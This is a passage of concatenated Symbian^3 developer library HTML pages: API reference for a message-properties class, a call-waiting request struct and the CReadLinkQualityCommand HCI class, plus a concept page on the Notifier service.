id="GUID-F64BB449-0A1A-3448-A3AC-50250B799BD1"> <a name="GUID-F64BB449-0A1A-3448-A3AC-50250B799BD1"> <!-- --> </a> <h2 class="topictitle2"> SetMessageType(MSenMessage::TClass) </h2> <table class="signature"> <tr> <td> void </td> <td> SetMessageType </td> <td> ( </td> <td> <a href="GUID-400DDC19-D81C-3596-BB17-0135195824B0.html"> MSenMessage::TClass </a> </td> <td> aType </td> <td> ) </td> <td> [inline] </td> </tr> </table> <div class="section"> <div> <p> Setter for message class enumeration MSenMessage.h </p> </div> </div> <div class="section parameters"> <h3 class="sectiontitle"> Parameters </h3> <table border="0" class="parameters"> <tr> <td class="parameter"> <a href="GUID-400DDC19-D81C-3596-BB17-0135195824B0.html"> MSenMessage::TClass </a> aType </td> <td> </td> </tr> </table> </div> </div> <div class="nested1" id="GUID-7FC84016-8D1E-31AD-B9A9-DDBBBF8E8EFD"> <a name="GUID-7FC84016-8D1E-31AD-B9A9-DDBBBF8E8EFD"> <!-- --> </a> <h2 class="topictitle2"> SetPendingTransactionId(TInt) </h2> <table class="signature"> <tr> <td> void </td> <td> SetPendingTransactionId </td> <td> ( </td> <td> <a href="GUID-FC2F2B93-3D18-3BCC-9FD6-6BC6B240B667.html"> TInt </a> </td> <td> aId </td> <td> ) </td> <td> [inline] </td> </tr> </table> <div class="section"> <div> <p> Setter for pending transaction id. </p> </div> </div> <div class="section parameters"> <h3 class="sectiontitle"> Parameters </h3> <table border="0" class="parameters"> <tr> <td class="parameter"> <a href="GUID-FC2F2B93-3D18-3BCC-9FD6-6BC6B240B667.html"> TInt </a> aId </td> <td> </td> </tr> </table> </div> </div> <div class="nested1" id="GUID-BE43BD41-4CBE-3622-995C-114C9458B931"> <a name="GUID-BE43BD41-4CBE-3622-995C-114C9458B931"> <!-- --> </a> <h2 class="topictitle2"> SetPropertiesType(MSenProperties::TSenPropertiesClassType) </h2> <table class="signature"> <tr> <td> void </td> <td> SetPropertiesType </td> <td> ( </td> <td> <a href="GUID-EF00E2C6-EA3C-37F9-ADBF-D34A9ABFBE11.html"> MSenProperties::TSenPropertiesClassType </a> </td> <td> aType </td> <td> ) </td> <td> [inline] </td> </tr> </table> <div class="section"> <div> <p> Sets the (transport) properties type enumeration <a href="GUID-EF00E2C6-EA3C-37F9-ADBF-D34A9ABFBE11.html#GUID-EF00E2C6-EA3C-37F9-ADBF-D34A9ABFBE11"> MSenProperties </a> </p> </div> </div> <div class="section parameters"> <h3 class="sectiontitle"> Parameters </h3> <table border="0" class="parameters"> <tr> <td class="parameter"> <a href="GUID-EF00E2C6-EA3C-37F9-ADBF-D34A9ABFBE11.html"> MSenProperties::TSenPropertiesClassType </a> aType </td> <td> where ENotInUse indicates that there are no associated properties, and all the others point to a concrete properties class. </td> </tr> </table> </div> </div> <div class="nested1" id="GUID-9274CE96-B743-30E2-BA4E-AD3F7D3D1602"> <a name="GUID-9274CE96-B743-30E2-BA4E-AD3F7D3D1602"> <!-- --> </a> <h2 class="topictitle2"> SetTransactionId(TInt) </h2> <table class="signature"> <tr> <td> void </td> <td> SetTransactionId </td> <td> ( </td> <td> <a href="GUID-FC2F2B93-3D18-3BCC-9FD6-6BC6B240B667.html"> TInt </a> </td> <td> aId </td> <td> ) </td> <td> [inline] </td> </tr> </table> <div class="section"> <div> <p> Setter for transaction id. </p> </div> </div> <div class="section parameters"> <h3 class="sectiontitle"> Parameters </h3> <table border="0" class="parameters"> <tr> <td class="parameter"> <a href="GUID-FC2F2B93-3D18-3BCC-9FD6-6BC6B240B667.html"> TInt </a> aId </td> <td> </td> </tr> </table> </div> </div> <div class="nested1" id="GUID-2BA99E48-5EE4-3FED-8487-AB0746B1D510"> <a name="GUID-2BA99E48-5EE4-3FED-8487-AB0746B1D510"> <!-- --> </a> <h2 class="topictitle2"> TransactionId() </h2> <table class="signature"> <tr> <td> <a href="GUID-FC2F2B93-3D18-3BCC-9FD6-6BC6B240B667.html"> TInt </a> </td> <td> TransactionId </td> <td> ( </td> <td> ) </td> <td> const [inline] </td> </tr> </table> <div class="section"> <div> <p> Getter for transaction id. </p> </div> </div> </div> <h1 class="pageHeading topictitle1"> Member Data Documentation </h1> <div class="nested1" id="GUID-8648CD28-719C-3F40-95BD-85C7CC586FA0"> <a name="GUID-8648CD28-719C-3F40-95BD-85C7CC586FA0"> <!-- --> </a> <h2 class="topictitle2"> TInt iContextId </h2> <table class="signature"> <tr> <td> <a href="GUID-FC2F2B93-3D18-3BCC-9FD6-6BC6B240B667.html"> TInt </a> </td> <td> iContextId </td> <td> [private] </td> </tr> </table> <div class="section"> </div> </div> <div class="nested1" id="GUID-1068BF39-9090-319B-A744-F4519F9C7CC2"> <a name="GUID-1068BF39-9090-319B-A744-F4519F9C7CC2"> <!-- --> </a> <h2 class="topictitle2"> TInt iDescriptorCount </h2> <table class="signature"> <tr> <td> <a href="GUID-FC2F2B93-3D18-3BCC-9FD6-6BC6B240B667.html"> TInt </a> </td> <td> iDescriptorCount </td> <td> [private] </td> </tr> </table> <div class="section"> </div> </div> <div class="nested1" id="GUID-CBC6B87F-5C14-397B-A683-B2777D409638"> <a name="GUID-CBC6B87F-5C14-397B-A683-B2777D409638"> <!-- --> </a> <h2 class="topictitle2"> TInt iDoInitBeforeSending </h2> <table class="signature"> <tr> <td> <a href="GUID-FC2F2B93-3D18-3BCC-9FD6-6BC6B240B667.html"> TInt </a> </td> <td> iDoInitBeforeSending </td> <td> [private] </td> </tr> </table> <div class="section"> </div> </div> <div class="nested1" id="GUID-AE21363E-8D86-3538-8C89-5100F3CF27FE"> <a name="GUID-AE21363E-8D86-3538-8C89-5100F3CF27FE"> <!-- --> </a> <h2 class="topictitle2"> TInt iMessageDirection </h2> <table class="signature"> <tr> <td> <a href="GUID-FC2F2B93-3D18-3BCC-9FD6-6BC6B240B667.html"> TInt </a> </td> <td> iMessageDirection </td> <td> [private] </td> </tr> </table> <div class="section"> </div> </div> <div class="nested1" id="GUID-8AE64B2B-DF35-35E9-AEC2-B1869619D1CC"> <a name="GUID-8AE64B2B-DF35-35E9-AEC2-B1869619D1CC"> <!-- --> </a> <h2 class="topictitle2"> TInt iMessageType </h2> <table class="signature"> <tr> <td> <a href="GUID-FC2F2B93-3D18-3BCC-9FD6-6BC6B240B667.html"> TInt </a> </td> <td> iMessageType </td> <td> [private] </td> </tr> </table> <div class="section"> </div> </div> <div class="nested1" id="GUID-41415D67-C28C-3700-8F50-FC47126388F6"> <a name="GUID-41415D67-C28C-3700-8F50-FC47126388F6"> <!-- --> </a> <h2 class="topictitle2"> TInt iPendingTransactionId </h2> <table class="signature"> <tr> <td> <a href="GUID-FC2F2B93-3D18-3BCC-9FD6-6BC6B240B667.html"> TInt </a> </td> <td> iPendingTransactionId </td> <td> [private] </td> </tr> </table> <div class="section"> </div> </div> <div class="nested1" id="GUID-44447BC4-8258-3961-B578-C0D51BA5C883"> <a name="GUID-44447BC4-8258-3961-B578-C0D51BA5C883"> <!-- --> </a> <h2 class="topictitle2"> TInt iPropertiesType </h2> <table class="signature"> <tr> <td> <a href="GUID-FC2F2B93-3D18-3BCC-9FD6-6BC6B240B667.html"> TInt </a> </td> <td> iPropertiesType </td> <td> [private] </td> </tr> </table> <div class="section"> </div> </div> <div class="nested1" id="GUID-661F2300-B0B5-370E-9BAA-E79AF0707597"> <a name="GUID-661F2300-B0B5-370E-9BAA-E79AF0707597"> <!-- --> </a> <h2 class="topictitle2"> TInt iTransactionId </h2> <table class="signature"> <tr> <td> <a href="GUID-FC2F2B93-3D18-3BCC-9FD6-6BC6B240B667.html"> TInt </a> </td> <td> iTransactionId </td> <td> [private] </td> </tr> </table> <div class="section"> </div> </div> <p class="copyright">Copyright &#169;2010 Nokia Corporation and/or its subsidiary(-ies).<br /> All rights reserved. Unless otherwise stated, these materials are provided under the terms of the <a href=" http://www.eclipse.org/legal/epl-v10.html"> Eclipse Public License v1.0</a>.</p> </div> </div> <?php include_once (CURRENT_SKIN_PATH.'/sdl_footer.html'); ?> </body> </html>
sdk/GUID-5A0A4E84-3189-3780-B793-25FC6B6FE441.html
warlordh/fork_Symbian
<?xml version='1.0' encoding='utf-8'?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html lang="en-us" xml:lang="en-us"> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <meta name="copyright" content="(C) Copyright 2010" /> <meta name="DC.rights.owner" content="(C) Copyright 2010" /> <meta name="DC.Type" content="cxxStruct" /> <meta name="DC.Title" content="CRetrieveMobilePhoneCWList::TGetCallWaitingRequest" /> <meta name="DC.Format" content="XHTML" /> <meta name="DC.Identifier" content="GUID-5A0A4E84-3189-3780-B793-25FC6B6FE441" /> <title> CRetrieveMobilePhoneCWList::TGetCallWaitingRequest </title> <link type="text/css" rel="stylesheet" href="css/common.css" media="screen"/> <link type="text/css" rel="stylesheet" href="css/sdl.css" media="screen"/> <!--[if IE]> <link href="css/iefix.css" rel="stylesheet" type="text/css" media="screen" /> <![endif]--> <meta name="keywords" content="api" /> <link rel="stylesheet" type="text/css" href="cxxref.css" /> </head> <body class="cxxref" id="GUID-5A0A4E84-3189-3780-B793-25FC6B6FE441"> <a name="GUID-5A0A4E84-3189-3780-B793-25FC6B6FE441"> <!-- --> </a> <?php include_once (CURRENT_SKIN_PATH.'/sdl_header.html'); ?> <div id="sdl_container"> <div id="leftMenu"> <div id="expandcontractdiv"> <a id="collapseTree" href="javascript:tree.collapseAll()"> Collapse all </a> <a id="index" href="index.html"> Symbian^3 Application Developer Library </a> </div> <iframe style="border:none" height="800" width="300" src="index-toc.html"></iframe> <div id="treeDiv1"> &#160; </div> <script type="text/javascript"> var currentIconMode = 0; window.name="id2518338 id2518347 id2858858 id2544002 id2544694 id2544699 id2544958 "; YAHOO.util.Event.onDOMReady(buildTree, this,true); </script> </div> <div id="sdl_content"> <div class="breadcrumb"> <a href="index.html" title="Symbian^3 Application Developer Library"> Symbian^3 Application Developer Library </a> &gt; </div> <h1 class="topictitle1"> CRetrieveMobilePhoneCWList::TGetCallWaitingRequest Struct Reference </h1> <table class="signature"> <tr> <td> struct CRetrieveMobilePhoneCWList::TGetCallWaitingRequest </td> </tr> </table> <div class="section"> </div> <div class="section member-index"> <table border="0" class="member-index"> <thead> <tr> <th colspan="2"> Public Attributes </th> </tr> </thead> <tbody> <tr> <td align="right" valign="top"> <a href="GUID-DF60B12C-64DE-3D65-87BC-E8D79EADDD32.html"> RMobilePhone::TClientId </a> </td> <td> <a href="#GUID-10EB538E-DAF4-3607-98CA-FE98CD4DF93C"> iClient </a> </td> </tr> <tr class="bg"> <td align="right" valign="top"> RMobilePhone::TMobileInfoLocation </td> <td> <a href="#GUID-DFF5B711-A5AB-3019-8605-EEBAA7F56DAE"> iLocation </a> </td> </tr> </tbody> </table> </div> <h1 class="pageHeading topictitle1"> Member Data Documentation </h1> <div class="nested1" id="GUID-10EB538E-DAF4-3607-98CA-FE98CD4DF93C"> <a name="GUID-10EB538E-DAF4-3607-98CA-FE98CD4DF93C"> <!-- --> </a> <h2 class="topictitle2"> RMobilePhone::TClientId iClient </h2> <table class="signature"> <tr> <td> <a href="GUID-DF60B12C-64DE-3D65-87BC-E8D79EADDD32.html"> RMobilePhone::TClientId </a> </td> <td> iClient </td> </tr> </table> <div class="section"> </div> </div> <div class="nested1" id="GUID-DFF5B711-A5AB-3019-8605-EEBAA7F56DAE"> <a name="GUID-DFF5B711-A5AB-3019-8605-EEBAA7F56DAE"> <!-- --> </a> <h2 class="topictitle2"> RMobilePhone::TMobileInfoLocation iLocation </h2> <table class="signature"> <tr> <td> RMobilePhone::TMobileInfoLocation </td> <td> iLocation </td> </tr> </table> <div class="section"> </div> </div> <p class="copyright">Copyright &#169;2010 Nokia Corporation and/or its subsidiary(-ies).<br /> All rights reserved. Unless otherwise stated, these materials are provided under the terms of the <a href=" http://www.eclipse.org/legal/epl-v10.html"> Eclipse Public License v1.0</a>.</p> </div> </div> <?php include_once (CURRENT_SKIN_PATH.'/sdl_footer.html'); ?> </body> </html>
sdk/GUID-CABA0B4D-11E4-5659-B949-C4277FB63804.html
warlordh/fork_Symbian
<?xml version='1.0' encoding='utf-8'?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html lang="en" xml:lang="en"> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <meta name="copyright" content="(C) Copyright 2010" /> <meta name="DC.rights.owner" content="(C) Copyright 2010" /> <meta name="DC.Type" content="concept" /> <meta name="DC.Title" content="Notifier" /> <meta name="abstract" content="A notifier is a simple service that allows either a single line message (an infoprint) or a simple dialog box to be displayed on the hardware's display device." /> <meta name="description" content="A notifier is a simple service that allows either a single line message (an infoprint) or a simple dialog box to be displayed on the hardware's display device." /> <meta name="DC.Relation" scheme="URI" content="GUID-F77578A2-3B11-5C29-9D00-43B971561876.html" /> <meta name="DC.Relation" scheme="URI" content="index.html" /> <meta name="DC.Relation" scheme="URI" content="GUID-32E29020-1956-461A-B79A-1492E06049E7.html" /> <meta name="DC.Relation" scheme="URI" content="GUID-E3D2A6ED-8192-563D-8966-DD96B3AF1783.html" /> <meta name="DC.Relation" scheme="URI" content="GUID-0DF9E318-BE97-531E-AB39-A7B5E8787C87.html" /> <meta name="DC.Relation" scheme="URI" content="GUID-A63025D1-7FD4-5120-8A1F-537D6B70103D.html" /> <meta name="DC.Relation" scheme="URI" content="GUID-3786D8E6-17A9-52E4-A8DF-CFCDC3039854.html" /> <meta name="DC.Relation" scheme="URI" content="GUID-F77578A2-3B11-5C29-9D00-43B971561876.html" /> <meta name="DC.Format" content="XHTML" /> <meta name="DC.Identifier" content="GUID-CABA0B4D-11E4-5659-B949-C4277FB63804" /> <meta name="DC.Language" content="en" /> <link rel="stylesheet" type="text/css" href="commonltr.css" /> <title> Notifier </title> <link type="text/css" rel="stylesheet" href="css/common.css" media="screen"/> <link type="text/css" rel="stylesheet" href="css/sdl.css" media="screen"/> <!--[if IE]> <link href="css/iefix.css" rel="stylesheet" type="text/css" media="screen" /> <![endif]--> <link rel="stylesheet" type="text/css" href="nokiacxxref.css" /> </head> <body id="GUID-CABA0B4D-11E4-5659-B949-C4277FB63804"> <a name="GUID-CABA0B4D-11E4-5659-B949-C4277FB63804"> <!-- --> </a> <?php include_once (CURRENT_SKIN_PATH.'/sdl_header.html'); ?> <div id="sdl_container"> <div id="leftMenu"> <div id="expandcontractdiv"> <a id="collapseTree" href="javascript:tree.collapseAll()"> Collapse all </a> <a id="index" href="index.html"> Symbian^3 Application Developer Library </a> </div> <iframe style="border:none" height="800" width="300" src="index-toc.html"></iframe> <div id="treeDiv1"> &#160; </div> <script type="text/javascript"> var currentIconMode = 0; window.name="id2470542 id2404579 id2404588 id2404596 id2405740 id2406108 "; YAHOO.util.Event.onDOMReady(buildTree, this,true); </script> </div> <div id="sdl_content"> <div class="breadcrumb"> <a href="index.html" title="Symbian^3 Application Developer Library"> Symbian^3 Application Developer Library </a> &gt; <a href="GUID-32E29020-1956-461A-B79A-1492E06049E7.html" title="The Symbian Guide describes the architecture and functionality of the platform, and provides guides on using its APIs."> Symbian Guide </a> &gt; <a href="GUID-E3D2A6ED-8192-563D-8966-DD96B3AF1783.html" title="Kernel and Hardware Services performs the fundamental operating system tasks of managing access to device resources."> Kernel and Hardware Services Guide </a> &gt; <a href="GUID-0DF9E318-BE97-531E-AB39-A7B5E8787C87.html" title="Provides a framework for accessing file systems."> User Library and File Server </a> &gt; <a href="GUID-A63025D1-7FD4-5120-8A1F-537D6B70103D.html" title="The User Library allows the applications and services that run on a phone to access the functionality provided by the Symbian platform Kernel."> User Library </a> &gt; <a href="GUID-3786D8E6-17A9-52E4-A8DF-CFCDC3039854.html"> Inter Process Communication </a> &gt; <a href="GUID-F77578A2-3B11-5C29-9D00-43B971561876.html"> Using Notification Services </a> &gt; </div> <h1 class="topictitle1"> Notifier </h1> <div> <p> A notifier is a simple service that allows either a single line message (an infoprint) or a simple dialog box to be displayed on the hardware's display device. </p> <p> It is used for sending (debug) trace messages to the screen and putting up debug dialog boxes. It can be used in any environment, including the text shell used for development of engine or low level type code. Because it doesn't require Uikon it is invaluable for developers who need to work without GUI dependencies. </p> <p> The dialog box consists of two lines of text and two buttons. The buttons each display a single text character and the user is expected to key in one of these characters. </p> <p> The notifier is a server, managed by the Kernel. The client side creates a session through an <samp class="codeph"> RNotifier </samp> handle. </p> <div class="p"> <div class="note"> <span class="notetitle"> Note: </span> </div> If a plug-in notifier DLL fails to load successfully, the OS will not start. Notifiers are critical system resources which must not fail to load correctly. </div> </div> <div> <div class="familylinks"> <div class="parentlink"> <strong> Parent topic: </strong> <a href="GUID-F77578A2-3B11-5C29-9D00-43B971561876.html"> Using Notification Services </a> </div> </div> </div> <p class="copyright">Copyright &#169;2010 Nokia Corporation and/or its subsidiary(-ies).<br /> All rights reserved. Unless otherwise stated, these materials are provided under the terms of the <a href=" http://www.eclipse.org/legal/epl-v10.html"> Eclipse Public License v1.0</a>.</p> </div> </div> <?php include_once (CURRENT_SKIN_PATH.'/sdl_footer.html'); ?> </body> </html>
sdk/GUID-D06F284D-4844-35EC-BA54-4703B8D4BDE4.html
warlordh/fork_Symbian
<?xml version='1.0' encoding='utf-8'?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html lang="en-us" xml:lang="en-us"> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <meta name="copyright" content="(C) Copyright 2010" /> <meta name="DC.rights.owner" content="(C) Copyright 2010" /> <meta name="DC.Type" content="cxxClass" /> <meta name="DC.Title" content="CReadLinkQualityCommand" /> <meta name="DC.Format" content="XHTML" /> <meta name="DC.Identifier" content="GUID-D06F284D-4844-35EC-BA54-4703B8D4BDE4" /> <title> CReadLinkQualityCommand </title> <link type="text/css" rel="stylesheet" href="css/common.css" media="screen"/> <link type="text/css" rel="stylesheet" href="css/sdl.css" media="screen"/> <!--[if IE]> <link href="css/iefix.css" rel="stylesheet" type="text/css" media="screen" /> <![endif]--> <meta name="keywords" content="api" /> <link rel="stylesheet" type="text/css" href="cxxref.css" /> </head> <body class="cxxref" id="GUID-D06F284D-4844-35EC-BA54-4703B8D4BDE4"> <a name="GUID-D06F284D-4844-35EC-BA54-4703B8D4BDE4"> <!-- --> </a> <?php include_once (CURRENT_SKIN_PATH.'/sdl_header.html'); ?> <div id="sdl_container"> <div id="leftMenu"> <div id="expandcontractdiv"> <a id="collapseTree" href="javascript:tree.collapseAll()"> Collapse all </a> <a id="index" href="index.html"> Symbian^3 Application Developer Library </a> </div> <iframe style="border:none" height="800" width="300" src="index-toc.html"></iframe> <div id="treeDiv1"> &#160; </div> <script type="text/javascript"> var currentIconMode = 0; window.name="id2518338 id2518347 id2858858 id2858862 id2860162 id2860211 "; YAHOO.util.Event.onDOMReady(buildTree, this,true); </script> </div> <div id="sdl_content"> <div class="breadcrumb"> <a href="index.html" title="Symbian^3 Application Developer Library"> Symbian^3 Application Developer Library </a> &gt; </div> <h1 class="topictitle1"> CReadLinkQualityCommand Class Reference </h1> <table class="signature"> <tr> <td> class CReadLinkQualityCommand </td> </tr> </table> <div class="section"> <div> <p> This class represents the ReadLinkQuality HCI Command </p> </div> </div> <div class="section member-index"> <table border="0" class="member-index"> <thead> <tr> <th colspan="2"> Public Member Functions </th> </tr> </thead> <tbody> <tr> <td align="right" class="code"> </td> <td> <a href="#GUID-E772B83E-4EC5-397C-9F1A-0804807F61A8"> ~CReadLinkQualityCommand </a> () </td> </tr> <tr class="bg"> <td align="right" class="code"> IMPORT_C <a href="GUID-62FE6E05-E17C-34C1-A465-86105D0741EC.html"> THCIConnectionHandle </a> </td> <td> <a href="#GUID-B47247CB-50A2-3B33-8233-1A9351ED2CFD"> ConnectionHandle </a> () </td> </tr> <tr> <td align="right" class="code"> <a href="GUID-FC2F2B93-3D18-3BCC-9FD6-6BC6B240B667.html"> TInt </a> </td> <td> <a href="#GUID-525B1556-9C7A-3670-A491-0755D0B5D746"> Extension_ </a> ( <a href="GUID-FC2F2B93-3D18-3BCC-9FD6-6BC6B240B667.html"> TUint </a> , <a href="GUID-FC2F2B93-3D18-3BCC-9FD6-6BC6B240B667.html"> TAny </a> *&amp;, <a href="GUID-FC2F2B93-3D18-3BCC-9FD6-6BC6B240B667.html"> TAny </a> *) </td> </tr> <tr class="bg"> <td align="right" class="code"> IMPORT_C <a href="GUID-D06F284D-4844-35EC-BA54-4703B8D4BDE4.html"> CReadLinkQualityCommand </a> * </td> <td> <a href="#GUID-33E36B11-D392-338D-B9DD-F589BCED8929"> NewL </a> ( <a href="GUID-62FE6E05-E17C-34C1-A465-86105D0741EC.html"> THCIConnectionHandle </a> ) </td> </tr> <tr> <td align="right" class="code"> IMPORT_C <a href="GUID-D06F284D-4844-35EC-BA54-4703B8D4BDE4.html"> CReadLinkQualityCommand </a> * </td> <td> <a href="#GUID-45A4F96C-E7C1-34F8-A592-6D742775828A"> NewL </a> () </td> </tr> <tr class="bg"> <td align="right" class="code"> IMPORT_C void </td> <td> <a href="#GUID-D7819EE4-0025-3AA3-9DA7-F8428B469841"> Reset </a> ( <a href="GUID-62FE6E05-E17C-34C1-A465-86105D0741EC.html"> THCIConnectionHandle </a> ) </td> </tr> </tbody> </table> <table border="0" class="member-index"> <thead> <tr> <th colspan="2"> Private Member Functions </th> </tr> </thead> <tbody> <tr> <td align="right" class="code"> </td> <td> <a href="#GUID-D7C8C372-7638-375C-93DF-B15CACDE2CA2"> CReadLinkQualityCommand </a> ( <a href="GUID-62FE6E05-E17C-34C1-A465-86105D0741EC.html"> THCIConnectionHandle </a> ) </td> </tr> <tr class="bg"> <td align="right" class="code"> </td> <td> <a href="#GUID-B114108E-483A-37CE-8955-11B61516C3DC"> CReadLinkQualityCommand </a> () </td> </tr> <tr> <td align="right" class="code"> void </td> <td> <a href="#GUID-2AFA12DA-69F9-3B68-8A15-8ACD23357E92"> Format </a> ( <a href="GUID-9E53472B-3B77-31D3-A766-3D6A8B66F85B.html"> CHctlCommandFrame </a> &amp;) </td> </tr> </tbody> </table> <table border="0" class="member-index"> <thead> <tr> <th colspan="2"> Private Attributes </th> </tr> </thead> <tbody> <tr> <td align="right" valign="top"> <a href="GUID-62FE6E05-E17C-34C1-A465-86105D0741EC.html"> THCIConnectionHandle </a> </td> <td> <a href="#GUID-69A3E898-B552-3EBA-A9E5-B491444CC122"> iConnectionHandle </a> </td> </tr> </tbody> </table> </div> <h1 class="pageHeading topictitle1"> Constructor &amp; Destructor Documentation </h1> <div class="nested1" id="GUID-D7C8C372-7638-375C-93DF-B15CACDE2CA2"> <a name="GUID-D7C8C372-7638-375C-93DF-B15CACDE2CA2"> <!-- --> </a> <h2 class="topictitle2"> CReadLinkQualityCommand(THCIConnectionHandle) </h2> <table class="signature"> <tr> <td> CReadLinkQualityCommand </td> <td> ( </td> <td> <a href="GUID-62FE6E05-E17C-34C1-A465-86105D0741EC.html"> THCIConnectionHandle </a> </td> <td> aConnectionHandle </td> <td> ) </td> <td> [private] </td> </tr> </table> <div class="section"> </div> <div class="section parameters"> <h3 class="sectiontitle"> Parameters </h3> <table border="0" class="parameters"> <tr> <td class="parameter"> <a href="GUID-62FE6E05-E17C-34C1-A465-86105D0741EC.html"> THCIConnectionHandle </a> aConnectionHandle </td> <td> </td> </tr> </table> </div> </div> <div class="nested1" id="GUID-B114108E-483A-37CE-8955-11B61516C3DC"> <a name="GUID-B114108E-483A-37CE-8955-11B61516C3DC"> <!-- --> </a> <h2 class="topictitle2"> CReadLinkQualityCommand() </h2> <table class="signature"> <tr> <td> CReadLinkQualityCommand </td> <td> ( </td> <td> ) </td> <td> [private] </td> </tr> </table> <div class="section"> </div> </div> <div class="nested1" id="GUID-E772B83E-4EC5-397C-9F1A-0804807F61A8"> <a name="GUID-E772B83E-4EC5-397C-9F1A-0804807F61A8"> <!-- --> </a> <h2 class="topictitle2"> ~CReadLinkQualityCommand() </h2> <table class="signature"> <tr> <td> ~CReadLinkQualityCommand </td> <td> ( </td> <td> ) </td> <td> </td> </tr> </table> <div class="section"> </div> </div> <h1 class="pageHeading topictitle1"> Member Functions Documentation </h1> <div class="nested1" id="GUID-B47247CB-50A2-3B33-8233-1A9351ED2CFD"> <a name="GUID-B47247CB-50A2-3B33-8233-1A9351ED2CFD"> <!-- --> </a> <h2 class="topictitle2"> ConnectionHandle() </h2> <table class="signature"> <tr> <td> IMPORT_C <a href="GUID-62FE6E05-E17C-34C1-A465-86105D0741EC.html"> THCIConnectionHandle </a> </td> <td> ConnectionHandle </td> <td> ( </td> <td> ) </td> <td> const </td> </tr> </table> <div class="section"> </div> </div> <div class="nested1" id="GUID-525B1556-9C7A-3670-A491-0755D0B5D746"> <a name="GUID-525B1556-9C7A-3670-A491-0755D0B5D746"> <!-- --> </a> <h2 class="topictitle2"> Extension_(TUint, TAny *&amp;, TAny *) </h2> <table class="signature"> <tr> <td> <a href="GUID-FC2F2B93-3D18-3BCC-9FD6-6BC6B240B667.html"> TInt </a> </td> <td> Extension_ </td> <td> ( </td> <td> <a href="GUID-FC2F2B93-3D18-3BCC-9FD6-6BC6B240B667.html"> TUint </a> </td> <td> aExtensionId, </td> </tr> <tr> <td colspan="3"> </td> <td> <a href="GUID-FC2F2B93-3D18-3BCC-9FD6-6BC6B240B667.html"> TAny </a> *&amp; </td> <td> aInterface, </td> </tr> <tr> <td colspan="3"> </td> <td> <a href="GUID-FC2F2B93-3D18-3BCC-9FD6-6BC6B240B667.html"> TAny </a> * </td> <td> aData </td> </tr> <tr> <td colspan="2"> </td> <td> ) </td> <td colspan="2"> [virtual] </td> </tr> </table> <div class="section"> </div> <div class="section parameters"> <h3 class="sectiontitle"> Parameters </h3> <table border="0" class="parameters"> <tr> <td class="parameter"> <a href="GUID-FC2F2B93-3D18-3BCC-9FD6-6BC6B240B667.html"> TUint </a> aExtensionId </td> <td> </td> </tr> <tr class="bg"> <td class="parameter"> <a href="GUID-FC2F2B93-3D18-3BCC-9FD6-6BC6B240B667.html"> TAny </a> *&amp; aInterface </td> <td> </td> </tr> <tr> <td class="parameter"> <a href="GUID-FC2F2B93-3D18-3BCC-9FD6-6BC6B240B667.html"> TAny </a> * aData </td> <td> </td> </tr> </table> </div> </div> <div class="nested1" id="GUID-2AFA12DA-69F9-3B68-8A15-8ACD23357E92"> <a name="GUID-2AFA12DA-69F9-3B68-8A15-8ACD23357E92"> <!-- --> </a> <h2 class="topictitle2"> Format(CHctlCommandFrame &amp;) </h2> <table class="signature"> <tr> <td> void </td> <td> Format </td> <td> ( </td> <td> <a href="GUID-9E53472B-3B77-31D3-A766-3D6A8B66F85B.html"> CHctlCommandFrame </a> &amp; </td> <td> aCommandFrame </td> <td> ) </td> <td> const [private, virtual] </td> </tr> </table> <div class="section"> </div> <div class="section parameters"> <h3 class="sectiontitle"> Parameters </h3> <table border="0" class="parameters"> <tr> <td class="parameter"> <a href="GUID-9E53472B-3B77-31D3-A766-3D6A8B66F85B.html"> CHctlCommandFrame </a> &amp; aCommandFrame </td> <td> </td> </tr> </table> </div> </div> <div class="nested1" id="GUID-33E36B11-D392-338D-B9DD-F589BCED8929"> <a name="GUID-33E36B11-D392-338D-B9DD-F589BCED8929"> <!-- --> </a> <h2 class="topictitle2"> NewL(THCIConnectionHandle) </h2> <table class="signature"> <tr> <td> IMPORT_C <a href="GUID-D06F284D-4844-35EC-BA54-4703B8D4BDE4.html"> CReadLinkQualityCommand </a> * </td> <td> NewL </td> <td> ( </td> <td> <a href="GUID-62FE6E05-E17C-34C1-A465-86105D0741EC.html"> THCIConnectionHandle </a> </td> <td> aConnectionHandle </td> <td> ) </td> <td> [static] </td> </tr> </table> <div class="section"> </div> <div class="section parameters"> <h3 class="sectiontitle"> Parameters </h3> <table border="0" class="parameters"> <tr> <td class="parameter"> <a href="GUID-62FE6E05-E17C-34C1-A465-86105D0741EC.html"> THCIConnectionHandle </a> aConnectionHandle </td> <td> </td> </tr> </table> </div> </div> <div class="nested1" id="GUID-45A4F96C-E7C1-34F8-A592-6D742775828A"> <a name="GUID-45A4F96C-E7C1-34F8-A592-6D742775828A"> <!-- --> </a> <h2 class="topictitle2"> NewL() </h2> <table class="signature"> <tr> <td> IMPORT_C <a href="GUID-D06F284D-4844-35EC-BA54-4703B8D4BDE4.html"> CReadLinkQualityCommand </a> * </td> <td> NewL </td> <td> ( </td> <td> ) </td> <td> [static] </td> </tr> </table> <div class="section"> </div> </div> <div class="nested1" id="GUID-D7819EE4-0025-3AA3-9DA7-F8428B469841"> <a name="GUID-D7819EE4-0025-3AA3-9DA7-F8428B469841"> <!-- --> </a> <h2 class="topictitle2"> Reset(THCIConnectionHandle) </h2> <table class="signature"> <tr> <td> IMPORT_C void </td> <td> Reset </td> <td> ( </td> <td> <a href="GUID-62FE6E05-E17C-34C1-A465-86105D0741EC.html"> THCIConnectionHandle </a> </td> <td> aConnectionHandle </td> <td> ) </td> <td> </td> </tr> </table> <div class="section"> </div> <div class="section parameters"> <h3 class="sectiontitle"> Parameters </h3> <table border="0" class="parameters"> <tr> <td class="parameter"> <a href="GUID-62FE6E05-E17C-34C1-A465-86105D0741EC.html"> THCIConnectionHandle </a> aConnectionHandle </td> <td> </td> </tr> </table> </div> </div> <h1 class="pageHeading topictitle1"> Member Data Documentation </h1> <div class="nested1" id="GUID-69A3E898-B552-3EBA-A9E5-B491444CC122"> <a 